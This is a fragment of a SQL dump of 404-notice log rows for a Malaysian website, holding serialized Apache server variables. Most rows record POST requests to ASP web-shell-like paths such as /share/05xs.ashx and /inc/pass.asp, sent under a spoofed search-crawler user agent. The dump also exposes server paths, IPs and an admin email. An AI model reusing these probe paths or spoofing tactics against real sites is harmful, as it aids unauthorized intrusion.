Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.62.164.26\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.62.164.26\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0KsH0ANMsr0w2B2wx1QAAAQ8\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"59802\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0KsH0ANMsr0w2B2wx1QAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419178.6739\";s:12:\"REQUEST_TIME\";s:10:\"1571419178\";}}','notice','2019-10-18 17:19:41','2019-10-18 17:19:39',35335664,37131544,'http://bintara.com.my//inc/config.asp',1,0,'218.62.164.26'),(28316,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"218.24.76.56\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"218.24.76.56\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0MgVftBBpAv@TWWu81AAAAEU\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"60058\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0MgVftBBpAv@TWWu81AAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419186.9514\";s:12:\"REQUEST_TIME\";s:10:\"1571419186\";}}','notice','2019-10-18 17:19:48','2019-10-18 17:19:47',35264800,37074720,'http://bintara.com.my//inc/config.asp',1,0,'218.24.76.56'),(28317,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.112.178.239\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.112.178.239\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0XsDvTLQMcXIRTTl01wAAAg4\";s:12:\"REDIRECT_URL\";s:16:\"/admin/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"61161\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0XsDvTLQMcXIRTTl01wAAAg4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419231.1307\";s:12:\"REQUEST_TIME\";s:10:\"1571419231\";}}','notice','2019-10-18 17:20:33','2019-10-18 17:20:31',35267328,37072160,'http://bintara.com.my//admin/index.asp',1,0,'220.112.178.239'),(28318,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//csgfcvb/md5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"122.8.138.19\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"122.8.138.19\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/csgfcvb/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/csgfcvb/md5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0fAVftBBpAv@TWWu89AAAAEQ\";s:12:\"REDIRECT_URL\";s:16:\"/csgfcvb/md5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"61724\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/csgfcvb/md5.asp\";s:10:\"SCRIPT_URL\";s:16:\"/csgfcvb/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0fAVftBBpAv@TWWu89AAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419260.7424\";s:12:\"REQUEST_TIME\";s:10:\"1571419260\";}}','notice','2019-10-18 17:21:05','2019-10-18 17:21:01',35734688,37543000,'http://bintara.com.my//csgfcvb/md5.asp',1,0,'122.8.138.19'),(28319,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//csgfcvb/md5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"121.68.7.46\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"121.68.7.46\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/csgfcvb/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/csgfcvb/md5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0hMH0ANMsr0w2B2wx2wAAAQQ\";s:12:\"REDIRECT_URL\";s:16:\"/csgfcvb/md5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"62198\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/csgfcvb/md5.asp\";s:10:\"SCRIPT_URL\";s:16:\"/csgfcvb/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0hMH0ANMsr0w2B2wx2wAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571419268.292\";s:12:\"REQUEST_TIME\";s:10:\"1571419268\";}}','notice','2019-10-18 17:21:10','2019-10-18 17:21:08',35267976,37076144,'http://bintara.com.my//csgfcvb/md5.asp',1,0,'121.68.7.46'),(28320,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"//admini.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.127.202.119\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.127.202.119\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/admini.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/admini.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0lAVftBBpAv@TWWu8-gAAAEI\";s:12:\"REDIRECT_URL\";s:11:\"/admini.asp\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"62618\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/admini.asp\";s:10:\"SCRIPT_URL\";s:11:\"/admini.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0lAVftBBpAv@TWWu8-gAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419284.3242\";s:12:\"REQUEST_TIME\";s:10:\"1571419284\";}}','notice','2019-10-18 17:21:25','2019-10-18 17:21:24',35265568,37078368,'http://bintara.com.my//admini.asp',1,0,'202.127.202.119'),(28321,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//share/05xs.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.134.37.75\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.134.37.75\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/share/05xs.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/share/05xs.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan089@tMXWkyeodXCWMAgAAAZA\";s:12:\"REDIRECT_URL\";s:16:\"/share/05xs.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"65120\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/share/05xs.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/share/05xs.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan089@tMXWkyeodXCWMAgAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571419380.91\";s:12:\"REQUEST_TIME\";s:10:\"1571419380\";}}','notice','2019-10-18 17:23:03','2019-10-18 17:23:01',35259728,37061240,'http://bintara.com.my//share/05xs.ashx',1,0,'61.134.37.75'),(28322,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//share/05xs.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"202.92.68.4\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"202.92.68.4\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/share/05xs.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/share/05xs.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1Cd@tMXWkyeodXCWMBgAAAYU\";s:12:\"REDIRECT_URL\";s:16:\"/share/05xs.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"49608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/share/05xs.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/share/05xs.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1Cd@tMXWkyeodXCWMBgAAAYU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419402.5302\";s:12:\"REQUEST_TIME\";s:10:\"1571419402\";}}','notice','2019-10-18 17:23:24','2019-10-18 17:23:22',35339984,37146320,'http://bintara.com.my//share/05xs.ashx',1,0,'202.92.68.4'),(28323,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//share/05xs.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.240.128.186\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.240.128.186\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/share/05xs.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/share/05xs.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1DsH0ANMsr0w2B2wx7wAAAQU\";s:12:\"REDIRECT_URL\";s:16:\"/share/05xs.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"49890\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/share/05xs.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/share/05xs.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1DsH0ANMsr0w2B2wx7wAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419406.7212\";s:12:\"REQUEST_TIME\";s:10:\"1571419406\";}}','notice','2019-10-18 17:23:28','2019-10-18 17:23:27',35266200,37071432,'http://bintara.com.my//share/05xs.ashx',1,0,'218.240.128.186'),(28324,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//inc/pass.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 